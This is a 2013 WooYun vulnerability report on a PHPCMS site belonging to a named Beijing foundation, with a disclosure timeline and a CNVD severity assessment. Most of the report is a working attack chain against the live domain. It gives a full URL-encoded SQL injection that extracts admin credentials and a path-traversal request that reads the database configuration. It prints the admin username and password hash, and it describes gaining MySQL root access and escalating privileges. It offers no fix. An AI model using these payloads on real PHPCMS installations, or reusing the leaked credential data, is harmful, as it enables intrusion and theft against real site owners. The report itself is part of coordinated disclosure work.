当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017028

漏洞标题:北京成龙基金会PHPCMS漏洞,可获取服务器管理权限

相关厂商:北京成龙基金会

漏洞作者: 扁扁

提交时间:2013-01-07 11:06

修复时间:2013-02-21 11:07

公开时间:2013-02-21 11:07

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-07: 细节已通知厂商并且等待厂商处理中
2013-01-09: 厂商已经确认,细节仅向厂商公开
2013-01-19: 细节向核心白帽子及相关领域专家公开
2013-01-29: 细节向普通白帽子公开
2013-02-08: 细节向实习白帽子公开
2013-02-21: 细节向公众公开

简要描述:

通过PHPCMS漏洞可以取得服务器权限

详细说明:

http://www.chengloongcishan.org/
存在PHPCMS,SQL注入和任意文件读取漏洞

漏洞证明:

第一步:注册一个用户
http://www.chengloongcishan.org/index.php?m=member&c=index&a=register&siteid=1
第二步:访问api文件,爆出表前缀,表前缀为cs
http://www.chengloongcishan.org/api.php?op=add_favorite&url=wooyun.in&title=%2527
第三步:爆出用户密码
api.php?op=add_favorite&url=cs&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520cs_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271

1.jpg


爆出账号密码为 admin 1eaa3cd0eaf48acfaf66ed35967ef9aa
任意文件读取文件漏洞!
利用办法
/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../
phpsso_server/caches/configs/database.php

2.jpg


爆出MYSQL数据库的账号密码,root权限!
扫描一下有没有开启3306端口,很幸运,开了3306
连接一下MYSQL数据库,成功连接,提权

3.jpg

修复方案:

不懂

版权声明:转载请注明来源 扁扁@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-01-09 14:10

厂商回复:

CNVD确认并复现所述情况,已经在8日通过多方联系,与网站管理方联系上并协调处置。
按完全影响机密性、完整性,部分影响可用性进行评分,基本危害评分9.67(高危),发现技术难度系数1.1(很典型的一次测试),涉及行业或单位影响系数1.2,综合rank=9.67*1.1*1.2=12.764

最新状态:

暂无